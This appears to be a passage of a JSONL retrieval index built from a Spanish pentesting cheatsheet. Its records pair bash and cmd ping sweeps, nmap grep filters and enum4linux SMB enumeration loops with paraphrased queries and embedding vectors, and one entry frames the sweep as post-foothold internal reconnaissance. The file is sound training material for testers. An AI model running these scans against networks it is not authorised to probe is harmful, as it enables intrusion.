0.00163, 0.00169, -0.02525, -0.01157, -0.00308, 0.00398, -0.00128, 0.05592, 0.01441, -0.03005, -0.05572, -0.00907, 0.09993, 0.02474, -0.0557, -0.07277, -0.0175, -0.07784, 0.00487, -8e-05, -0.02866, -0.00296, 0.07733, 0.07753, -0.0379, 0.01441, 0.07792]} -{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Ping sweep (descubrir hosts sin nmap)\n```bash\nfor i in $(seq 1 254); do ping -c1 -W1 10.11.1.$i >/dev/null && echo \"10.11.1.$i UP\"; done\n```\n```cmd\nfor /L %i in (1,1,254) do @ping -n 1 -w 200 10.5.5.%i >nul && echo 10.5.5.%i up\n```\n(PowerShell rΓ‘pido β†’ Port scanner PowerShell). Útil tras un foothold para mapear la red interna antes de Tunneling.", "indexar": "con quΓ© puedo hacer una prueba de portabilidad rΓ‘pida en PowerShell", "v": [-0.12629, 0.07559, -0.15974, -0.08182, -0.05591, 0.04263, 0.0869, -0.0028, 0.05426, -0.1092, -0.15434, 0.11914, -0.00042, -0.05553, -0.06938, 0.10555, -0.031, -0.01724, -0.06326, -0.03773, 0.00987, -0.10757, -0.21214, -0.12073, 0.10239, 0.06275, 0.06393, 0.21047, -0.14941, -0.06448, -0.09421, 0.01531, 0.07597, -0.0564, -0.0579, 0.07281, -0.07442, 0.13626, 0.18571, 0.12117, -0.02601, 0.0811, -0.00461, -0.02693, 0.04369, 0.00022, -0.04238, -0.08066, -0.05682, -0.02207, -0.11455, -0.12621, -0.0852, -0.04047, 0.03053, -0.11457, -0.00933, -0.08389, -0.06257, -0.0184, -0.03515, 0.06063, -0.05934, -0.01193, -0.05229, -0.00398, -0.05336, -0.01193, -0.10326, 0.05596, -0.08648, -0.03284, 0.00681, -0.03362, -0.10156, -0.00636, 0.02344, 0.03295, 0.015, 0.03296, -0.02477, 0.0307, -0.07804, -0.0888, -0.06094, 0.01313, -0.06746, -0.13659, 0.03044, -0.01757, 0.10637, 0.02984, 0.06343, 0.04849, -0.00783, -0.00259, 0.03179, 0.05287, -0.04153, -0.09647, 0.02415, -0.11418, -0.06956, 0.05666, 0.01469, 0.01086, -0.0122, 0.01328, -0.02275, -0.0691, 0.00213, 0.0187, -0.07571, -0.03548, -0.05368, 0.05862, -0.0254, -0.11864, -0.16768, 0.05446, -0.03722, -0.04323, 0.00755, 0.02667, 0.05274, 0.01673, 0.07169, 0.00373, 0.01167, 0.0316, 0.08543, 0.0205, -0.01123, -0.06108, 0.02371, -0.00973, -0.05448, -0.04839, 0.00121, -0.07034, 0.03418, 0.01097, 0.01547, -0.03601, -0.01675, -0.02468, -0.10051, 0.0443, -0.07099, 0.07754, -0.02235, 0.02574, 0.02042, 0.05117, -0.05247, -0.04833, 0.10918, 0.00372, -0.04274, -0.00502, -0.08513, 0.06519, -0.03485, 0.04744, 0.0434, -0.01638, -0.04081, -0.03586, -0.00564, -0.04361, -0.03035, 0.0691, -0.06126, 0.0101, 0.13407, 0.02209, -0.03274, -0.04329, -0.04203, -0.09059, -0.03251, 0.05403, -0.07177, -0.02876, -0.0241, 0.03768, 0.08287, -0.02741, 0.09853, 0.02675, 0.01699, 0.0252, 0.02601, -0.02872, 0.02505, -0.02852, 0.04965, 0.00636, -0.04949, -0.01072, -0.08004, -0.06847, -0.0349, -0.00012, 0.05679, 0.02187, -0.02381, 0.0465, -0.02392, -0.00538, 0.05997, 0.0508, 0.12679, -0.00935, -0.04545, 0.01769, 0.00451, -0.01223, -0.03183, 0.0202, -0.01113, 0.02757, 0.01425, 0.07015, 0.04002, 0.05833, 0.01107, -0.03948, -0.02448, 0.09867, 0.05302, 0.00712, -0.03145, -0.01276, 0.0756, -0.03868, -0.05619, 0.00571, -0.01388, -0.04065, -0.03212, 0.04435, 0.01021, 0.02449, -0.05854, -0.01012, -0.04963, 0.0145, -0.02803, -0.05996, -0.04044, -0.01422, 0.02578, -0.04326, 0.04308, -0.02263]} -{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Ping sweep (descubrir hosts sin nmap)\n```bash\nfor i in $(seq 1 254); do ping -c1 -W1 10.11.1.$i >/dev/null && echo \"10.11.1.$i UP\"; done\n```\n```cmd\nfor /L %i in (1,1,254) do @ping -n 1 -w 200 10.5.5.%i >nul && echo 10.5.5.%i up\n```\n(PowerShell rΓ‘pido β†’ Port scanner PowerShell). Útil tras un foothold para mapear la red interna antes de Tunneling.", "indexar": "cuΓ‘l es una alternativa libre al nmap para escanear hosts en mi red interna", "v": [0.07255, -0.04009, -0.04682, 0.02316, -0.02978, 0.02733, -0.18384, -0.10339, -0.18737, -0.02312, -0.12762, -0.176, 0.09882, -0.03141, 0.08022, 0.04791, -0.07394, 0.04522, 0.20023, 0.14401, -0.18497, 0.0338, -0.12077, 0.06432, 0.01304, 0.00833, -0.03561, 0.12426, -0.04245, -0.02637, -0.00411, -0.04768, 0.00377, -0.01606, -0.00382, 0.02791, 0.18828, -0.00865, 0.06782, -0.06027, -0.08434, -0.00627, -0.05849, -0.0137, 0.04107, -0.06051, -0.10693, 0.05323, -0.05354, 0.0813, -0.09915, -0.05202, -0.08118, -0.01228, 0.02158, -0.06536, -0.0306, -0.10518, -0.06408, 0.02266, -0.0639, 0.09328, 0.02288, -0.02244, 0.06133, -0.03053, -0.05998, 0.00282, -0.05903, 0.02488, -0.00279, -0.03061, 0.00242, -0.03032, -0.06244, 0.03944, -0.08191, -0.01711, 0.02281, 0.09658, 0.09028, -0.03415, -0.10136, 0.07033, 0.03622, -0.05419, 0.09545, -0.14847, 0.02547, 0.02447, 0.08074, 0.00876, 0.06158, 0.0993, -0.01304, -0.135, 0.03874, 0.05636, -0.02409, 0.02041, 0.01269, 0.07486, -0.13062, 0.0208, -0.00108, 0.01397, 0.03043, 0.02646, -0.01146, 0.05239, 0.10077, 0.07294, -0.10007, -0.00834, -0.02503, -0.0846, 0.00594, 0.05573, -0.01689, -0.03615, -0.06623, -0.06166, -0.04523, -0.06321, -0.00626, 0.0157, 0.04578, -0.04685, 0.01991, 0.0895, -0.07461, -0.02463, -0.01585, -0.08541, -0.09243, -0.03238, -0.02372, -0.08786, 0.03398, 0.08168, -0.07744, -0.02371, -0.03975, -0.06899, 0.01928, 0.03746, 0.03472, -0.09255, 0.03998, 0.00591, -0.05357, -0.0022, -0.05426, 0.03596, -0.04356, 0.05904, -0.00968, -0.04304, -0.06499, 0.15127, 0.04716, -0.08788, -0.02035, -0.01264, -0.00373, -0.04748, 0.01148, -0.05115, -0.05902, -0.03952, 0.01231, 0.09784, -0.05154, -0.10186, 0.0603, -0.07134, 0.02883, -0.14395, -0.00055, -0.08081, 0.04806, 0.03883, -0.08228, -0.00389, 0.00905, -0.04949, 0.00924, 0.04591, -0.02512, -0.03207, -0.03471, 0.00344, 0.03496, -0.03672, -0.01627, 0.01885, 0.01302, -0.10726, -0.02261, -0.02276, -0.0904, 0.01318, -0.01401, -0.02303, -0.00293, -0.0515, -0.03149, 0.05717, 0.03067, 0.07738, 0.02574, 0.01989, 0.09594, -0.00444, -0.05062, 0.04322, 0.04172, 0.01674, 0.05266, -0.06298, 0.09827, 0.04997, 0.03457, 0.00968, -0.03892, 0.03964, -0.00956, -0.0243, -0.03686, -0.01143, 0.03881, -0.00853, -0.00909, 0.03601, -0.00418, -0.05713, 0.03523, 0.04135, 0.03932, -0.01136, 0.08473, 0.04664, -0.06025, -0.01279, -0.0071, 0.00145, -0.06174, 0.02223, -0.0294, 0.00449, -0.04999, 0.00166, -0.00291, -0.05088, 0.02339, 0.04474]} -{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Filtrar resultados de nmap (greppable)\n```bash\ngrep \"445/open\" smb.txt | cut -d' ' -f2 # IPs con ese puerto\ngrep -c \"445/open\" smb.txt # cuΓ‘ntos hosts lo tienen\ngrep \"Status: Up\" scan.gnmap | cut -d' ' -f2 # hosts vivos\n```", "indexar": "que programa sirve para filtrar las IPs abiertas en nmap?", "v": [0.16393, -0.02622, -0.13429, -0.1349, 0.08203, -0.20165, 0.01825, -0.05556, -0.22037, -0.01292, 0.15656, -0.05855, 0.07828, -0.14733, -0.10224, 0.06045, -0.05408, -0.12526, 0.08433, 0.03771, -0.12207, 0.18704, -0.16449, -0.12515, -0.11409, 0.10602, -0.04235, 0.02098, -0.09389, -0.09712, -0.05092, -0.02913, 0.02892, -0.06636, -0.0463, -0.06677, 0.04566, -0.01605, -0.02194, 0.02605, 0.04473, 0.08223, -0.00893, 0.01268, 0.05082, 0.03043, 0.03291, -0.04454, 0.00467, -0.0045, -0.09541, -0.07526, 0.03247, 0.03931, -0.10411, 0.00278, -0.09673, -0.09719, -0.07949, 0.04143, -0.03549, 0.05797, 0.04013, -0.10486, -0.00465, -0.14445, 0.00637, 0.01221, -0.05529, -0.05528, -0.04314, -0.02003, 0.00674, 0.06388, -0.02904, 0.03077, -0.04268, -0.07895, 0.08887, -0.00866, 0.04552, 0.02835, -0.02941, -8e-05, -0.09612, -0.04759, 0.06752, -0.08692, -0.01826, -0.08409, -0.01451, 0.14645, -0.01749, 0.1209, 0.08935, -0.04014, 0.09374, 0.08946, 0.0083, 0.05213, 0.08105, -0.02498, -0.11628, 0.07331, -0.01885, 0.07564, 0.08307, -0.01617, 0.02683, 0.06508, 0.00487, 0.05279, -0.06566, -0.10457, 0.01444, -0.02276, 0.00305, -0.07327, 0.02719, -0.03463, -0.02968, -0.03023, -0.06415, 0.01263, 0.04603, 0.07013, 0.01735, 0.0651, -0.00372, 0.10296, -0.0, 0.08503, -0.07747, 0.02843, -0.0043, -0.10031, -0.01587, -0.03044, -0.02145, 0.01448, 0.02738, 0.00972, 0.01561, -0.00811, 0.06284, -0.04245, 0.07419, -0.08497, -0.01242, -0.03052, 0.06775, -0.0224, -0.0104, 0.04279, -0.09654, 0.03784, 0.01275, -0.07987, -0.04637, 0.09215, -0.07646, 0.01782, 0.01292, -0.03017, 0.09047, 0.04676, -0.03742, 0.00147, 0.12536, 0.00035, 0.03717, 0.04154, -0.00588, -0.04791, -0.03633, 0.00281, 0.01584, -0.01018, 0.03353, -0.01316, -0.05797, 0.01841, 0.01932, 0.00722, -0.06286, 0.00791, -0.04942, -0.02082, -0.0336, 0.00983, 0.05432, -0.02215, -0.04904, 0.00553, 0.05277, -0.04777, -0.03302, -0.06258, 0.0092, -0.03856, -0.07449, 0.0137, -0.04053, 0.01494, -0.01535, 0.08802, -0.01583, -0.00807, 0.02496, 0.06868, -0.02867, -0.02433, 0.04759, -0.02614, -0.05339, 0.03024, 0.01744, 0.05377, 0.05727, 0.0453, 0.00363, 0.02167, 0.01773, 0.03482, -0.00118, -0.04278, 0.02703, -0.01788, 0.0492, -0.03257, -0.04334, -0.01776, -0.04843, -0.05115, 0.02334, -0.02194, -0.03807, -0.01957, 0.00769, -0.07116, -0.01819, 0.02434, -0.01952, -0.08402, 0.03674, -0.03664, -0.05547, 0.03724, 0.02316, -0.02469, -0.09101, 0.00245, -0.00191, -0.03011, 0.04857, 0.02948]} -{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Filtrar resultados de nmap (greppable)\n```bash\ngrep \"445/open\" smb.txt | cut -d' ' -f2 # IPs con ese puerto\ngrep -c \"445/open\" smb.txt # cuΓ‘ntos hosts lo tienen\ngrep \"Status: Up\" scan.gnmap | cut -d' ' -f2 # hosts vivos\n```", "indexar": "con que puedo saber cuantos hosts tienen el puerto 445 abierto?", "v": [0.04253, 0.03224, -0.12647, -0.00075, -0.02596, -0.01226, 0.16191, -0.145, -0.13673, -0.1727, -0.12741, 0.02088, 0.10306, -0.0174, -0.0004, -0.02018, -0.01108, 0.09293, 0.12567, -0.00626, -0.06452, -0.01472, -0.09568, -0.11132, 0.08935, 0.04051, 0.00058, 0.09905, -0.09922, 0.02751, 0.03626, -0.05973, -0.05126, 0.07524, 0.12158, -0.04466, 0.02203, 0.13159, 0.03075, 0.10959, 0.00322, 0.05629, -0.01988, -0.02994, 0.16455, -0.07648, -0.13704, -0.08767, 0.01785, -0.06637, -0.01671, -0.06215, -0.00641, -0.0328, -0.09481, -0.01644, 0.01434, 0.09871, 0.00936, -0.03425, -0.03639, 0.00739, 0.0304, -0.1014, 0.00582, -0.09092, 0.04955, 0.14079, -0.13376, -0.00834, -0.05532, 0.00027, -0.02571, 0.13763, -0.01522, 0.02867, 0.01599, -0.00534, 0.01234, 0.07813, 0.00394, 0.01158, 0.06432, -0.12617, -0.01605, -0.06203, -0.07942, -0.0264, 0.03713, -0.10516, 0.05976, 0.04253, 0.03341, 0.11993, -0.07007, -0.03067, 0.01941, 0.12388, -0.03077, 0.07408, 0.04964, 0.11709, -0.05119, 0.0488, 0.0108, 0.07554, -0.02135, -0.19818, 0.06123, 0.06308, 0.06721, 0.05388, -0.02755, -0.0604, -0.01792, -0.00399, -0.06729, -0.03823, 0.06198, 0.00785, -0.0721, -0.09255, -0.01029, 0.05954, 0.06177, -0.00873, -0.0033, 0.05211, 0.08151, -0.01032, 0.00844, -0.0291, -0.06023, -0.03679, -0.01234, -0.05277, 0.01545, 0.0029, -0.03139, 0.04812, -0.08038, 0.07265, 0.01057, -0.09088, 0.06919, -0.04221, -0.07674, -0.04252, -0.09822, -0.03111, 0.03643, 0.06489, -0.03153, 0.04037, -0.05828, 0.06544, 0.11288, -0.08758, 0.00576, 0.03494, 0.01399, 0.02649, -0.10465, -0.03177, 0.01064, -0.03671, -0.0764, 0.01483, 0.04035, -0.01358, -0.03809, 0.07243, -0.0726, -0.02918, -2e-05, 0.00208, -0.11275, -0.03098, -0.08377, -0.02896, -0.0139, -0.0274, -0.07071, -0.04663, -0.07704, -0.02243, 0.07657, -0.03645, -0.0259, 0.05983, 0.04519, 5e-05, -0.02538, -0.03406, 0.02821, 0.07048, 0.03999, -0.03297, -0.01992, -0.01699, 0.01322, 0.05404, 0.0526, -0.02284, 0.00187, 0.03245, -0.03776, 0.07071, 0.01173, 0.03899, 0.02419, -0.03018, 0.07435, -0.03491, -0.02932, 0.03028, -0.06572, 0.01836, 0.09371, 0.05905, 0.01993, 0.06035, 0.00931, -0.02664, 0.05014, 0.03605, 0.05802, 0.01204, 0.08005, 0.05659, -0.04392, 0.00747, 0.01239, -0.02466, -0.01033, 0.01212, -0.01854, -0.03086, -0.012, 0.03596, 0.08561, 0.04007, -0.02293, -0.07688, 0.02345, -0.04042, -0.00554, 0.08105, -0.04248, -0.01755, -0.10023, 0.05849, 0.00335, -0.07909, 0.00186, 0.0575]} -{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Filtrar resultados de nmap (greppable)\n```bash\ngrep \"445/open\" smb.txt | cut -d' ' -f2 # IPs con ese puerto\ngrep -c \"445/open\" smb.txt # cuΓ‘ntos hosts lo tienen\ngrep \"Status: Up\" scan.gnmap | cut -d' ' -f2 # hosts vivos\n```", "indexar": "cual es una alternativa libre a nmap para ver los resultados?", "v": [-0.04031, 0.07095, -0.03115, 0.00677, -0.12035, 0.04553, -0.10183, -0.06104, -0.20323, -0.06429, 0.0046, -0.23336, 0.04359, 0.00845, -0.02517, 0.00474, -0.08504, -0.11029, 0.16948, 0.08386, -0.14896, -0.01308, -0.14354, -0.10305, -0.05819, 0.02601, 0.01034, 0.10056, -0.04209, -0.05425, -0.00765, -0.05222, 0.02836, -0.06808, -0.01748, 0.10898, 0.21983, -0.02825, 0.06788, -0.00947, -0.07042, -0.05587, -0.03608, 0.04538, 0.00666, -0.09477, -0.1051, 0.06978, -0.02896, 0.03134, -0.0701, 0.10178, -0.07241, 0.03155, 0.0329, -0.04568, -0.00861, -0.09044, -0.03079, 0.00369, -0.10449, 0.03537, -0.0336, -0.11256, -0.00814, -0.00287, -0.00434, -0.05048, -0.01192, 0.02205, 0.06158, -0.05967, 0.02791, -0.04826, -0.15546, 0.07913, -0.05367, -0.02097, -0.04044, 0.0066, 0.09261, -0.12533, -0.05413, -0.00157, -0.06207, -0.08974, 0.0992, -0.09734, 0.04433, 0.00379, 0.02776, 0.082, 0.00479, 0.13748, -0.03885, -0.1529, -0.02372, 0.04653, -0.02077, 0.08168, 0.07247, 0.0957, -0.12369, -0.00853, -0.01546, -0.02506, -0.00116, 0.10231, -0.14108, 0.07763, 0.05916, 0.03959, -0.05353, 0.01691, -0.00852, -0.07464, 0.00045, 0.01983, -0.03551, -0.03292, -0.04849, 0.01576, -0.00246, -0.03324, -0.02796, 0.04032, 0.15209, -0.00155, -0.01697, 0.1079, 0.03691, 0.00398, -0.0864, -0.10011, -0.04642, -0.04119, 0.0855, -0.05188, 0.04186, 0.07923, -0.02685, -0.03741, 0.01606, -0.07612, 0.02876, -0.0965, 0.04547, -0.00126, 0.0243, -0.06785, -0.06095, -0.01099, -0.00047, 0.06769, -0.04095, 0.04921, -0.06958, -0.01563, -0.00794, 0.12691, 0.00728, -0.05078, 0.00877, 0.0362, 0.00449, -0.00401, 0.01147, -0.0214, -0.04726, -0.02207, -0.00427, 0.03651, 0.04671, -0.07083, 0.09532, -0.03741, 0.01471, -0.04592, 0.0153, -0.04177, 0.03106, 0.03948, -0.0697, 0.00408, 0.00341, -0.08984, 0.02456, 0.01403, -0.02424, 0.04358, 0.02114, 0.02603, -0.08335, -0.09513, -0.02154, 0.00722, 0.01213, -0.1154, -0.02436, -0.04686, -0.0579, -0.01962, -0.02576, 0.00102, -0.0775, -0.04509, -0.0174, 0.03975, 0.02525, 0.03758, 0.0263, 0.01167, 0.06585, -0.00342, -0.08015, 0.04194, 0.00722, -0.06197, -0.02908, -0.01945, 0.0695, 0.02343, 0.00954, 0.01041, -0.01599, 0.01796, -0.00959, 0.0511, -0.01902, -0.00039, -0.0162, 0.00619, -0.01752, 0.03175, 0.02003, 0.00124, 0.00999, 0.03767, 0.02711, -0.024, 0.07052, 0.05272, -0.00416, -0.01355, -0.05809, 0.0002, -0.09011, 0.01177, -0.07279, -0.04526, 0.00333, 0.01379, -0.01254, 0.0218, 0.04857, 0.03247]} -{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Bucle sobre IPs (anatomΓ­a)\n```bash\nfor ip in $(grep \"445/open\" smb.txt | cut -d' ' -f2); do\n echo \"=== $ip ===\"\n enum4linux -a $ip < /dev/null 2>/dev/null | grep -i alfred\ndone\n```\n- `< /dev/null` β†’ evita que se cuelgue en prompts `Password:`.\n- Si falta `done`, bash se queda en `for>` (Ctrl+C).", "indexar": "que programa sirve para escanear puertos 445 de manera no interactiva", "v": [0.18826, -0.04902, -0.18822, -0.08568, 0.12845, -0.19372, 0.11846, -0.17898, -0.04693, -0.04951, -0.05034, 0.02823, 0.07415, -0.09486, -0.00056, 0.01639, 0.03568, -0.06323, 0.09583, 0.09649, -0.0431, 0.089, -0.05068, -0.09706, -0.03305, 0.06665, -0.05637, -0.03142, 0.00464, 0.05198, -0.02454, 0.05446, 0.12534, -0.05268, 0.01261, -0.15239, 0.06623, -0.0374, 0.11037, 0.0485, 0.01861, 0.06877, -0.09755, -0.05559, 0.12545, -0.02385, -0.02781, -0.01766, 0.02232, 0.05268, -0.06176, 0.05018, -0.02802, 0.05812, -0.03645, -0.07115, -0.02281, -0.05337, -0.08946, -0.07499, -0.03171, 0.03279, -0.02556, -0.14695, 0.01441, -0.02716, 0.03279, 0.02967, -0.11726, 0.03517, -0.04034, 0.04527, 0.05901, 0.04664, -0.04295, -0.06046, 0.00031, 0.01468, 0.01473, 0.03649, 0.039, -0.01051, 0.04467, 0.01454, -0.05536, 0.0141, -0.03836, -0.0807, 0.02749, -0.11133, 0.01688, 0.04667, 0.04825, 0.10632, -0.00702, -0.07139, 0.09527, 0.08622, 0.07173, 0.05852, 0.08244, -0.02175, -0.0775, 0.08231, -0.02918, 0.08935, 0.06951, -0.0378, 0.00611, 0.10512, 0.07012, 0.03694, 0.01371, -0.06644, -0.07288, 0.05945, -0.03243, -0.05113, 0.08267, -0.01786, -0.05501, -0.01398, -0.04485, 0.03403, 0.06981, 0.03137, -0.01117, 0.06521, 0.02749, 0.04292, -0.00137, -0.07809, 0.01894, -0.06993, -0.07626, -0.16648, 0.01444, -0.11128, 0.00642, -0.03614, 0.02772, 0.09366, 0.00156, -0.00865, -0.04685, -0.00755, 0.09317, 0.02988, -0.03292, 0.02043, 0.03372, 0.0056, -0.07748, 0.03932, -0.06633, 0.00253, 0.12322, -0.01728, -0.12228, 0.07368, -0.05237, -0.02187, -0.01427, 0.00106, 0.04079, -0.08138, -0.1049, 0.00294, 0.04371, 0.05882, -0.00786, 0.15148, 0.01548, -0.14163, -0.01278, 0.03441, -0.05143, -0.04764, -0.0169, -0.04775, -0.09439, 0.02899, 0.01988, -0.07056, -0.08182, -0.07086, -0.03193, -0.06601, -0.03639, 0.06451, -0.00508, 0.00215, -0.06019, -0.00239, -0.00259, 0.04714, 0.01032, 0.04128, 0.01835, -0.0349, -0.00634, 0.01979, 0.06074, 0.00305, 0.01905, 0.10812, -0.02785, 0.00787, 0.08431, 0.11444, -0.01369, -0.02747, 0.03634, 0.05342, -0.00367, -0.05626, -0.00313, 0.05786, 0.08157, 0.11641, -0.05178, -0.01132, -0.02408, 0.03688, -0.01148, -0.00739, 0.05613, 0.02219, 0.01257, 0.00577, 0.01786, -0.05665, -0.00595, -0.01514, -0.00039, -0.03464, -0.01145, 0.00276, 0.01444, -0.07846, 0.02572, 0.04791, -0.06226, -0.02165, 0.03486, -0.0605, -0.00201, 0.04377, 0.03341, 0.02813, -0.07625, 0.02339, 0.01978, -0.02775, 0.01975, -0.0053]} -{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Bucle sobre IPs (anatomΓ­a)\n```bash\nfor ip in $(grep \"445/open\" smb.txt | cut -d' ' -f2); do\n echo \"=== $ip ===\"\n enum4linux -a $ip < /dev/null 2>/dev/null | grep -i alfred\ndone\n```\n- `< /dev/null` β†’ evita que se cuelgue en prompts `Password:`.\n- Si falta `done`, bash se queda en `for>` (Ctrl+C).", "indexar": "con quΓ© herramienta puedo analizar redes SMB sin que me pidan contraseΓ±a", "v": [-0.07824, 0.04352, -0.11814, -0.16818, -0.02944, -0.05099, -0.17767, -0.12796, -0.14899, -0.06616, 0.04678, 0.03898, 0.06201, -0.16955, 0.09366, 0.08817, 0.00837, -0.02766, 0.14047, 0.00126, 0.07984, -0.09007, -0.08375, -0.0453, -0.01312, -0.01876, 0.14617, 0.05809, -0.12327, -0.02583, -0.06966, 0.02648, 0.07407, -0.04281, -0.08966, 0.10516, -0.00277, 0.13695, 0.03076, 0.08694, 0.00657, 0.04517, -0.08185, 0.06198, 0.00252, 0.00732, -0.05614, 0.0112, -0.0056, 0.10272, -0.08528, -0.11945, -0.12941, -0.02918, -0.04557, -0.12064, 0.22292, -0.1018, 0.08504, -0.05297, -0.07876, 0.05388, 0.02009, 0.04824, 0.0051, -0.09549, 0.04522, 0.01076, -0.08611, 0.13163, 0.0574, 0.02987, -0.07673, -0.01086, 0.02845, 0.09123, 0.05909, 0.06662, 0.03433, 0.0981, -0.00517, -0.01659, -0.03285, 0.05827, -0.08444, -0.033, 0.0358, -0.04675, 0.06135, -0.06539, -0.00695, 0.02779, -0.0445, 0.03813, -0.01617, -0.00149, 0.00489, -0.08138, -0.04547, -0.03645, 0.05848, 0.01489, -0.10612, 0.07215, 0.0208, 0.03527, -0.06192, -0.01348, 0.00216, -0.06547, 0.06046, 0.05278, -0.04542, -0.05366, -0.02671, 0.00511, -0.06661, -0.08546, -0.0392, -0.02282, 0.03135, -0.02453, -0.04832, -0.08026, -0.01271, 0.02412, -0.0153, 0.10224, 0.0027, -0.07808, -0.00334, 0.01516, -0.05212, -0.02338, -0.02174, -0.02271, -0.06157, -0.20837, -0.11237, -0.07521, -0.06082, -0.03682, -0.05565, -0.09469, 0.04949, 0.06279, 0.02943, -0.10581, -0.10762, 0.00712, 0.0279, -0.00565, -0.00615, 0.02701, 0.01365, 0.10286, -0.05349, -0.04571, -0.06257, 0.06011, -0.0405, -0.06761, 0.018, 0.02051, -0.02223, -0.01614, 0.01649, 0.01572, 0.06626, 0.02769, -0.02848, 0.0671, 0.01089, -0.03425, 0.02098, -0.07451, -0.02272, -0.01463, -0.04985, -0.09069, -0.05011, -0.06982, -0.0286, -0.0408, -0.00766, -0.06294, 0.04995, -0.0076, -0.01307, 0.01064, 0.02081, 0.03639, 0.02719, 0.04536, 0.06425, -0.02228, 0.00079, -0.04808, 0.0351, -0.03395, -0.04905, -0.0085, -0.045, -0.03589, 0.03088, 0.05176, -0.08425, -0.03377, 0.00306, 0.00938, 0.04087, -0.0536, 0.02328, -0.08008, -0.00735, -0.05187, 0.0237, 0.05953, -0.02098, -0.00378, 0.05551, 0.0788, 0.07521, 0.04796, -0.04616, 0.01759, -0.07348, 0.00809, 0.01887, -0.02865, -0.00333, -0.03186, -0.03606, 0.02733, 0.05854, -0.06982, -0.04983, -0.05645, -0.0612, 0.00917, -0.03873, 0.0157, -0.00996, -0.01873, -0.04972, -0.0352, -0.04974, -0.02978, -0.02877, -0.04404, -0.01512, -0.00885, 0.06263, -0.03694, 0.0398, -0.00993]} -{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Enumerar SMB de todos y luego grep\n```bash\nfor ip in $(grep \"445/open\" smb.txt | cut -d' ' -f2); do enum4linux -a $ip < /dev/null > enum_$ip.txt 2>&1; done\ngrep -l \"alfred\" enum_*.txt # en QUΓ‰ host estΓ‘ el usuario\ngrep -iE 'remark|flag|OS\\{' enum_HOST.txt # flag en comentarios de shares\n```", "indexar": "cual es una alternativa libre a enum4linux?", "v": [-0.08901, -0.03561, -0.06714, 0.11143, -0.06387, -0.08793, -0.14097, -0.07072, -0.14878, -0.0339, -0.01081, -0.24968, -0.03109, 0.06464, 0.05984, -0.12453, -0.01165, -0.12784, 0.06732, 0.01392, -0.056, 0.0402, -0.15405, -0.09302, -0.05295, -0.06217, 0.06144, -0.01459, -0.02824, 0.02181, 0.08402, -0.01176, 0.09218, -0.03751, 0.02564, -0.01347, 0.15842, 0.10241, 0.11232, 0.05052, 0.03511, -0.04377, -0.11534, 0.11497, -0.04351, -0.08071, -0.15443, 0.06227, -0.01139, 0.07142, -0.09912, 0.05037, 0.02617, -0.05582, 0.09432, -0.02008, 0.10333, -0.07432, -0.069, -0.05973, -0.01505, -0.05248, 0.04201, -0.02179, 0.02324, 0.00643, -0.17188, 0.06734, -0.02206, 0.06257, 0.10161, -0.00112, -0.00943, -0.07346, -0.07523, 0.05306, -0.05318, -0.07176, -0.02405, 0.0521, 0.09017, -0.03989, 0.02729, 0.0629, -0.04157, -0.03949, 0.0647, -0.06248, -0.079, 0.0739, 0.12195, 0.00984, -0.00462, 0.08678, -0.05936, -0.08958, 0.03755, 0.07719, -0.01107, 0.01841, 0.04888, 0.05691, -0.08166, 0.015, 0.01714, -0.08225, 0.02997, 0.03514, -0.07872, 0.02691, 0.02795, 0.02363, 0.0132, 0.04554, -0.01654, -0.07742, -0.04057, 0.04156, 0.00428, 0.03169, -0.03029, 0.00634, -0.03483, -0.07554, 0.03931, 0.04932, 0.04346, 0.04937, 0.04453, 0.0141, 0.06765, -0.00684, -0.06456, -0.06535, -0.16398, -0.07427, 0.12002, -0.01671, 0.02237, 0.00456, 0.05841, -0.03866, 0.03491, -0.04246, 0.05543, -0.02046, 0.02127, 0.02219, 0.00551, -0.01867, 0.00922, -0.02306, 0.03839, 0.13297, -0.04624, -0.01058, -0.0281, -0.03614, -0.07725, 0.04178, 0.04579, 0.00288, 0.02815, 0.02806, -0.03846, 0.00605, -0.01759, -0.05405, -0.10643, 0.05543, -0.0274, 0.04629, 0.05847, -0.07238, 0.02575, -0.11095, -0.08378, -0.05146, -0.02484, 0.00622, -0.02009, 0.01053, -0.10952, -0.07755, -0.00283, -0.02076, -0.00052, 0.01856, 0.02072, 0.05824, 0.01458, -0.02523, -0.06057, -0.09023, -0.03032, 0.08444, 0.05148, -0.07751, -0.00577, -0.00449, -0.02224, -0.03754, 0.00727, -0.03177, -0.03394, 0.01665, -0.0414, 0.04737, -0.0271, 0.10657, 0.04891, 0.01368, 0.09984, 0.03126, -0.09357, -0.012, 0.09597, 0.0002, -0.05789, -0.00705, 0.04196, -0.0057, 0.03761, -0.0653, -0.04775, 0.01356, 0.02487, 0.00284, 0.00312, -0.02252, -0.01805, 0.01229, -0.00311, 0.02183, 0.02613, 0.00218, -0.00969, -0.00264, 0.02011, -0.00521, 0.1188, 0.07864, -0.10162, -0.03738, 